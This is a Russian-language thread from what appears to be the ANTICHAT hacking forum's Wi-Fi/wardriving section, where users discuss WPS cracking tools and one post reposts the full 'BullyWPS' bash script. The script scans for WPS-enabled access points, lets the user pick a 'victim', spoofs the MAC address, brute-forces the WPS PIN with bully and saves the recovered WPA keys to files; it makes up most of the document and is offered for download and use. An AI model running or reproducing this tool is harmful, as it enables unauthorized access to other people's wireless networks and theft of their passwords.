HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 26.06.2015, 19:36
pangyndo
Новичок
Регистрация: 13.06.2015
Сообщений: 3
С нами: 5746646

Репутация: 0
По умолчанию

Можно ссылку где взять???
 
Ответить с цитированием

  #22  
Старый 28.06.2015, 18:50
Vovan71
Познающий
Регистрация: 18.05.2015
Сообщений: 71
С нами: 5784086

Репутация: 0
По умолчанию

Какая то странная фигня.

Wifislax стоит на HDD.

Inflator и FreedingBootle сошли с ума.

Обе не хотят работать - при переводе карты в Monitor Mode, возвращает сообщение.

Can not into monitor mode!

и все тут.

Причем карта в реальности отрубается от инета.

Все остальные проги и скрипты без исключения работают отлично.

На трех разных адаптерах такое поведение.

Где у них там настройки глянуть? Чего не хватает им для счастья? Переставлять то не хоца :-/

P.S. Загрузился с флешки - все работает. Как бы вылечить на HDD?
 
Ответить с цитированием

  #23  
Старый 18.09.2015, 15:45
vovan54
Новичок
Регистрация: 18.12.2008
Сообщений: 4
С нами: 9155735

Репутация: 0
По умолчанию

Имею планшет Samsung KE500 T1C адаптер Broadcom 802.11abgn Wireless SDIO Adapter чипсет BCM4330 см.http://www.wireless-driver.com/broadcom-bcm4330-wireless-win7-win8-driver-utility/ . Подскажите каким софтом лучше пользоваться для wardrivinga.

Спасибо.
 
Ответить с цитированием

  #24  
Старый 24.09.2015, 23:37
in062
Познающий
Регистрация: 23.06.2015
Сообщений: 69
С нами: 5732246

Репутация: 0
По умолчанию

Цитата:
Сообщение от vovan54  

Имею планшет Samsung KE500 T1C адаптер Broadcom 802.11abgn Wireless SDIO Adapter чипсет BCM4330 см.http://www.wireless-driver.com/broadcom-bcm4330-wireless-win7-win8-driver-utility/ . Подскажите каким софтом лучше пользоваться для wardrivinga.

Спасибо.

Используй kali 2.0 или backtrack 5 R3 залей на загрузочную флешку и радуйся aircrack-ng там уже есть
 
Ответить с цитированием

  #25  
Старый 28.09.2015, 03:54
Andrey9999
Elder - Старейшина
Регистрация: 23.05.2012
Сообщений: 3,462
С нами: 7353686

Репутация: 81
По умолчанию

ну там, где Clave WPA...: - пароли от точек

Что не так?
 
Ответить с цитированием

  #26  
Старый 28.09.2015, 21:21
Andrey9999
Elder - Старейшина
Регистрация: 23.05.2012
Сообщений: 3,462
С нами: 7353686

Репутация: 81
По умолчанию

Цитата:
Сообщение от power84  

Хорошо. А Pin Wps - разве не имя точки?

Нет, имя - "MY_WI-FI", "ficks2008", но кстати зная pin - можно подключиться к точке даже без пароля)...
 
Ответить с цитированием

  #27  
Старый 29.09.2015, 04:46
Andrey9999
Elder - Старейшина
Регистрация: 23.05.2012
Сообщений: 3,462
С нами: 7353686

Репутация: 81
По умолчанию

Цитата:
Сообщение от power84  

Спасибо.

А как это сделать, как подключиться без пароля?

http://airslax.net/forum/4-103-1

Хотя у тебя и пароли есть
 
Ответить с цитированием

  #28  
Старый 26.10.2015, 10:18
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
С нами: 8115446

Репутация: 125


По умолчанию

Цитата:
Сообщение от Andrey9999  

но кстати зная pin - можно подключиться к точке даже без пароля)...

На самом деле, это просто так звучит.

Взять, например, всем известный WPS клиент JSW/QSS. Он работает по следующему алгоритму:

1. Поиск сетей с WPS

2. Использование пин кода на выбранной точке для получения пароля

3. Добавление нового профиля беспроводной сети в систему (имя сети / шифрование / пароль)

Таким образом, так или иначе, подключение к сети осуществляется по паролю. Другой вопрос, что этот алгоритм незаметен для простого пользователя.
 
Ответить с цитированием

  #29  
Старый 29.10.2015, 10:06
kaliastr2009
New Member
Регистрация: 19.10.2015
Сообщений: 28
С нами: 5562326

Репутация: 0
По умолчанию

Цитата:
Сообщение от 5maks5  

BullyWPS





Сделал перевод, поправил несколько функций.

Скачать:

https://www.sendspace.com/file/hy06j3 sendspace

http://notepad.cc/jasmoosi52 source mirror

ссылки битые не могли бы перезалит?
 
Ответить с цитированием

  #30  
Старый 10.11.2015, 09:30
5maks5
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами: 8265206

Репутация: 40
По умолчанию

Цитата:
Сообщение от kaliastr2009  

ссылки битые не могли бы перезалит?

Код:
#!/bin/bash 

# Global Variables
SCRIPT="BullyWPS"
VERSION="2.1"
KEYS="$HOME/$SCRIPT/KEYS"
TMP="/tmp/$SCRIPT"
WPSPIN="pinWPS" 

# Check if the interface is connected to internet
CheckETH() {
clear
if [ "$(ip route|grep default)" != "" ]; then
  ETH=$(ip route|awk '/default/ {print $5}')
  HW_WIFI=$(ifconfig $WIFI|awk '/HW/ {print $5}'|cut -d- -f1,2,3,4,5,6)
  HW_ETH=$(ifconfig $ETH|awk '/HW/ {print $5}'|tr ':' '-')
  if [ "$HW_ETH" = "$HW_WIFI" ];then
    echo
    echo "[0;31mЧтобы избежать ошибок на интерфейсе \"$ETH\" убедитесь, что отключены от интернета! [0m"
    echo ""
    echo "Нажмите enter для возврата в меню."
    read junk
    menu
  fi
fi
}

# Function to select the target to attack
SeleccionarObjetivo() {
i=0
redesWPS=0
while read BSSID Channel RSSI WPSVersion WPSLocked ESSID;do
  longueur=${#BSSID}
  if [ $longueur -eq 17 ] ; then
    i=$(($i+1))
    WPSbssid[$i]=$BSSID
    WPSchanel[$i]=$Channel
    WPSessid[$i]=$ESSID
    PWR[$i]=$RSSI
  fi
  redesWPS=$i
done  [1;36mSelect a network[0m"
  read WPSoption
  set -- ${WPSoption}

  if [ $WPSoption -le $redesWPS ]; then
    if [ "$WPSoption" = "0" ];then
      menu
    fi
    ESSID=${WPSessid[$WPSoption]}
    BSSID=${WPSbssid[$WPSoption]}
    CHANEL=${WPSchanel[$WPSoption]}
    clear
  else
    echo " Выбор не верен ... выберите заново"
    sleep 2
    SeleccionarObjetivo
  fi
fi
ShowWPA="OFF"
InfoAP="ON"
menu
}

# Ищем WPS сети с помощью Wash
WashScan() {
if [ "$WIFI" = "" ]; then auto_select_monitor && WashScan; fi
CheckETH
xterm -icon -e wash -i $WIFI -C -o $TMP/wash_capture.$$ & 
WashPID=$!
sec_rem=30 
sleep 30 && kill $WashPID &>/dev/null &
while true; do
let sec_rem=$sec_rem-1
        interval=$sec_rem
        seconds=`expr $interval % 60`
        interval=`expr $interval - $seconds`
  sleep 1
  clear
  echo "[1;33mИщем цели... [1;36m$seconds[0m [1;33mseconds[0m"
  echo ""
  cat $TMP/wash_capture.$$
  if [ ! -e /proc/$WashPID ]; then
    sleep 1
    break
  fi
done
SeleccionarObjetivo
}

auto_select_monitor() {
#! /bin/bash

#Переводим карту в режим monitor mode автоматически

clear
t=0
if [ "$WIFI" = "" ]; then
> $TEMP/wireless.txt
cards=`airmon-ng|cut -d ' ' -f 1 | awk {'print $1'} |grep -v Interface #|grep -v  mon   `
echo $cards >> $TEMP/wireless.txt
tarj1=`cat $TEMP/wireless.txt | cut -d  ' ' -f 1  | awk  '{print $1}'`
tarj2=`cat $TEMP/wireless.txt | cut -d  ' ' -f 2  | awk  '{print $1}'`
rm  -rf $TEMP/wireless.txt

if  [ "$tarj1" = "" ]; then
clear
echo "                  * * *     В Н И М А Н И Е   * * *                "
echo ""
echo "    Не найденно ни одной WiFi карточки на этом компьютере"
echo ""
echo "    Нажмите ENTER для возврата в меню"
read yn
menu
fi

if [ "$tarj1" = "$tarj2" ]; then
tarj2=""
fi

tarjselec=$tarj1

if [ "$tarj2" != "" ] ;then
echo
echo
echo "      Следующие WiFi карты найденны на компьютере"
echo

airmon-ng |awk 'BEGIN { print "Карта  Чип              Драйвер\n------- ------------------ ----------" } \
  { printf "%-8s %-8s %-1s %10s\n", $1, $2, $3, $4 | "sort -r"}' |grep -v Interface  |grep -v Chipset

echo "      Выберите одну из карт"
echo

tarj_wire=""
tarjselec=""
function selectarj {
select tarjselec in `airmon-ng | awk {'print $1 | "sort -r"'} |grep -v Interface |grep -v Chipset  `; do
break;
done

if [ "$tarjselec" = "" ]; then
echo "  Выбранные опции неверны."
echo "  Выберите верные опции..."
selectarj
fi
}

if [ "$tarjselec" = "" ]; then
selectarj
fi

echo ""
echo "Выбранный интерфейс: $tarjselec"

fi
else
echo 
fi
tarjmonitor=${tarjselec:0:3}
if [ "$tarjmonitor" != "mon" ] && [ "$WIFI" = "" ];then
echo ""
echo ""
echo "                    Переводим карту в режим monitor mode..."
echo "" 
sleep 1

#clean interface

ifconfig $tarjselec down >/dev/null
ifconfig $tarjselec up >/dev/null
        ifconfig $tarjselec down
        ifconfig $tarjselec hw ether 00:11:22:33:44:55
        ifconfig $tarjselec up

airmon-ng start $tarjselec >/dev/null
cards=`airmon-ng|cut -d ' ' -f 1 |awk {'print $1 | "sort -d"'} |grep -v Interface |grep -v wlan`
largo=${#cards}
final=$(($largo-4))
WIFI=${cards:final}
echo  " $WIFI ----> Monitor mode включен."
sleep 2

else 
if [ "$WIFI" = "" ];then
WIFI="$tarjselec"

echo "" 
echo  " $WIFI ----> Monitor mode уже включен."
sleep 2
fi
fi
clear

# Spoof Mac Address and put card into monitor mode
echo -e "Хотите сменить MAC адрес вашей WiFi карты? y/n"

read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
        wmac=00:11:22:33:44:55
        echo
        ifconfig $WIFI down
        macchanger -m 00:11:22:33:44:55 $WIFI
        ifconfig $WIFI up
        echo
        echo
        sleep 3
        else
echo "    Нажмите enter для продолжения."
read c
if [[ $c == "N" || $c == "n" || $c = "" ]]; then
        ifconfig $tarjselec down
        macchanger -p $tarjselec
        ifconfig $tarjselec up
        tput setaf 1; echo "продолжить без смены MAC"
        echo
        echo
        echo
        sleep 2
fi
fi
}  

function ObtenerWPA_con_pin_o_no {
read -p "Ввести PIN вручную? Y/n :" x y

if [[ $x == "Y" || $x == "y" || $x = "" ]]; then
 read -p "pinWPS: " XWPSPIN
 echo ""
 echo ""
 echo ""
xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $XWPSPIN -F -B -l 100 -v 3 &
 bullyPID=$!
# If "Control + C" is pressed, the process stops Bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
             PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
fi
fi
clear
echo "" 
echo "" 
echo "" 
wait
else
echo "    Нажмите enter для продолжения."
if [[ $y == "N" || $y == "n" || $y = "" ]]; then
read y
# Attack the Access point

xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -F -l 100 -v 3 &
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
             PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
echo "" 
sleep 3
echo ""
echo "    Нажмите enter для продолжения."
read junk
menu
fi
fi
fi
fi
}

function ObtenerWPA {
read -p "Ввести PIN вручную? Y/n :" y

if [[ $y == "Y" || $y == "y" || $y = "" ]]; then
read -p "pinWPS: " yWPSPIN
 echo ""
 echo ""
 echo ""
xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $yWPSPIN -F -B -v 3 &
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
             PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
fi
fi
clear
echo "" 
echo "" 
echo "" 
wait
else
echo "    Нажмите Enter для продолжения."
if [[ $e == "N" || $e == "n" || $e = "" ]]; then
read e
# Attack the Access point

xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID --force -B -v 3 &
 bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
             PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
sleep 3
echo ""
echo "Нажмите enter для возврата в меню"
read junk
menu
fi
fi
fi
fi
}

function Primer_pin {
read -p "YВвести PIN вручную? Y/n :" d

if [[ $d == "Y" || $d == "y" || $d = "" ]]; then
read -p "pinWPS: " dWPSPIN
 echo ""
 echo ""
 echo ""
CheckETH
xterm -hold -geometry 65x30-1-1 -e bully  $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $dWPSPIN -F -B -v 3  & 
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
             PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "Ключ WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
sleep 3
echo ""
echo "    Нажмите enter для продолжения."
read junk
menu
fi
fi
fi
}

#Functional Bully Commands
function optional_functions {
#Set optional functions
bully #to show the options available in terminal
echo "[+] bully $WIFI -b $BSSID -c $CHANEL -e $ESSID"
echo "[+] Enter other functions bully to attack with ex-A-C-D, etc. with spaces"
read bullyVars
#Start
xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID $bullyVars & 
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Starting bully (bully $WIFI -b $BSSID -c $CHANEL -e $ESSID $bullyVars)"
echo "[+] Attacking " $BSSID---$ESSID "on channel " $CHANEL " Good Luck and Happy Hacking"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
             PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "Key WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
sleep 3
echo ""
echo ""
echo "Нажмите enter для возврата в меню."
read junk
menu
fi
fi
}

#Function update Bully
function bully_update {
echo "   "
echo "          [1;32mЭто автоматический установщик обновлений для bully[0m"
echo ""
echo "        [1;36m[Необходим интернет для скачивания пакетов bully][0m"
echo ""
sleep 1
echo "Процедура скачивания последней версии."
sleep 3

# Download the latest Revision with svn
cd /tmp
echo "[1;32m"
svn co http://bully.googlecode.com/svn/trunk/src/ /tmp/bully-read-only && \
echo [0m
cd /tmp/bully-read-only
clear
sleep 2

# Version identification
if [ ! -d ".svn/" ]
then
    echo "0"
    exit ;
fi

REVISION="`svnversion 2> /dev/null | sed 's/[^0-9]*//g'`"

if [ x$REVISION = "x" ]
then
    REVISION="`svn info 2> /dev/null | grep -i revision | sed
's/[^0-9]*//g'`"
fi

if [ x$REVISION = "x" ]
then
    if [ -f ".svn/entries" ]
    then
        REVISION="`cat .svn/entries | grep -i revision | head -n 1 | sed
's/[^0-9]*//g'`"
    fi
fi

if [ x$REVISION = "x" ]
then
    REVISION="-1"
fi

# We report the version
echo ""
echo ""
echo "                      [1;33m>[0m"
sleep 3

# Compile
echo ""
echo ""
echo "[1;33mSe Процедура комплирования пакетов ..."
sleep 3
echo "[1;36m"
make  && \
echo "[0m"
clear
sleep 3

# Installed in system
echo ""
echo ""
echo "[1;35mПроцедура установки пакетов в систему..."
sleep 3
echo ""
echo "[1;33m"
make install && \
echo "[0m"
clear
sleep 3

# Limpiamos
echo ""
echo ""
echo "[1;36mЧищу временные файлы.."
echo ""
sleep 3
rm -Rf /tmp/bully-read-only/trunk/src/ &> /dev/null
rm -Rf $DESTDIR &> /dev/null
sleep 2

# We report the completion of the process
echo ""
echo ""
echo "[1;33mВсе задачи были выполненны! "
echo ""
echo ""
sleep 3
wait

# Press ENTER to return to menu

echo ""
echo "Нажмите enter для возврата в меню."
read yn
menu
}
#Function update macchanger
function macchanger_update {
echo "   "
echo "          [1;32mЭто автоматический установщик обновлений для macchanger[0m"
echo ""
echo "        [1;36m[Необходим интернет для скачивания пакетов macchanger][0m"
echo ""
sleep 1
echo "Процедура скачивания последней версии. "
sleep 3

# Download the latest Revision with svn
cd /tmp
echo "[1;32m"
git clone http://github.com/alobbs/macchanger/ /tmp/macchanger && \
echo [0m
cd /tmp/macchanger
clear
sleep 2
# Cmpile
echo ""
echo ""
echo "[1;33mSe Процедура комплирования пакетов ..."
sleep 3
echo "[1;36m"
bash autogen.sh
echo "[0m"
sleep 3
make  && \
echo "[0m"
clear
sleep 3

# Installed in system
echo ""
echo ""
echo "[1;35mПроцедура установки пакетов в систему..."
sleep 3
echo ""
echo "[1;33m"
make install && \
echo "[0m"
clear
sleep 3

# Clean
echo ""
echo ""
echo "[1;36mЧищу временные файлы.."
echo ""
sleep 3
rm -Rf /tmp/macchanger/ &> /dev/null
sleep 2

# We report the completion of the process
echo ""
echo ""
echo "[1;33mВсе процессы были выполненны! "
echo ""
echo ""
sleep 3
wait

# Press ENTER to return to menu

echo ""
    echo "Нажмите enter для возврата в меню."
read yn
menu
}

#Function card unmount and exit
function DESMONTAR_tarj_y_salir {
if [ "$WIFI" != "" ]; then
clear
echo ""
  echo ""
  echo ""
  echo "    [1;33m####################################################################"
  echo "    [1;33m###                                                              ###"
  echo "    [1;33m###     ¿ Извлечь карту после выхода?                            ###"
  echo "    [1;33m###                                                              ###"
  echo "    [1;33m###        (n) Нет  -> Выйти без извлечения                      ###"
  echo "    [1;33m###        (m) Меню -> Обратно в главное меню                    ###"
  echo "    [1;33m###        ENTER    -> Извлечь и выйти                           ###"
  echo "    [1;33m###       (r)+ENTER -> Восстановит оригинальный MAC              ###"
  echo "    [1;33m###                                                              ###"
  echo "    [1;33m####################################################################"
  echo ""
  echo ""
read salida
set -- ${salida}

if [ "$salida" = "r" ]; then
ifconfig $tarjselec down
macchanger -p $tarjselec
ifconfig $tarjselec up
fi
if [ "$salida" = "m" ]; then
menu
fi
if [ "$salida" = "n" ]; then
  echo ""
echo "         Ждите."
sleep 2
clear 
exit
fi
echo "$WIFI карта была успешно извлечена!"
airmon-ng stop $WIFI >/dev/null
fi
  echo ""
echo "         Ждите."
sleep 2
clear
 exit

}

menu() {
# Welcome
echo " #########################################################################################"
echo " #                                                                                       #"
echo " #    ~ Скрипт автоматической атаки на WPS с помощью Bully написан @cristi_28            #"
echo " #    ~ Перевод на русский: 5maks5 [ forum.antichat.ru/member.php?u=136564 ]             #"
echo " #    ~ Раздел беспроводные технологии: [ forum.antichat.ru/forum113.html ]              #"
echo " #    ~ Сайт автора: [ http://lampiweb.com ]; Поддержка: Kali,WifiSlax                   #"
echo " #    ~ Версия: 2.1 (перевод 19.07.14) зависимости: BullyWPS $VERSION                         #"
echo " #                                                                                       #"
echo " #                                                                                       #"
echo " #########################################################################################"
sleep 1
echo "---------------------------------------"
if [ "$InfoAP" = "ON" ]; then
  echo "Информация:"
  echo ""
  echo "              ESSID = $ESSID"
  echo "              Канал = $CHANEL"
  echo "         MAC AP = $BSSID"
  fi
  if [ "$ShowWPA" = "ON" ]; then
  echo "          WPA Key = $WPA_KEY"
  fi
  echo "---------------------------------------"
echo ""
echo " 1) Поиск точек с включенным WPS"
echo ""
echo " 2) Выбрать другую жертву"
echo ""
echo " 3) Подбор WPA с Bully"
echo ""
echo " 4) Подбор WPA без проверки калькулятора " 
echo ""
echo " 5) Добавить комманды Bully ( пр: -N -Z , итд. ) "
echo ""
echo " 6) Добавить первые 4 цифры + xxxx"
echo ""
echo " 7) Обновить Bully"
echo ""
echo " 8) Обновить MACChanger"
echo ""
echo " 0) Выход"
echo ""
read -p " #> " CHOISE
echo ""
case $CHOISE in
  1 ) WashScan;;
  2 ) SeleccionarObjetivo;;
  3 ) ObtenerWPA_con_pin_o_no;;
  4 ) ObtenerWPA;;
  5 ) optional_functions;;
  6 ) Primer_pin;;
  7 ) bully_update;;
  8 ) macchanger_update;;
  0 ) DESMONTAR_tarj_y_salir;;
  * ) echo "Неверно выбранный пункт!"; menu;;
esac
}

# User check
if [ "$(whoami)" != "root" ]; then
 echo -e '\e[1;31m

    ¡¡¡ Запуск возможен только от root !!!

        Проверка: sudo $0

\e[0m' 

 exit 1
fi

# Create directories if they do not exist 
if [ ! -d $TMP ]; then mkdir -p $TMP; else rm -rf $TMP/*; fi
if [ ! -d $KEYS ]; then mkdir -p $KEYS; fi
if [ -d $HOME/Desktop/Wireless-Keys ]; then
  if [ ! -d $HOME/Desktop/Wireless-Keys/$SCRIPT-keys ]; then
    ln -s $KEYS $HOME/Desktop/Wireless-Keys/$SCRIPT-keys
  fi
fi

# Eliminating interfaces in monitor
interfaces=$(ifconfig|awk '/^mon/ {print $1}')
if [ "$interfaces" != "" ]; then
  for monx in $interfaces; do
    airmon-ng stop $monx up >/dev/null 2>&1
  done
fi

menu
Сохранить в файл bully.sh и запускать с консоли.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.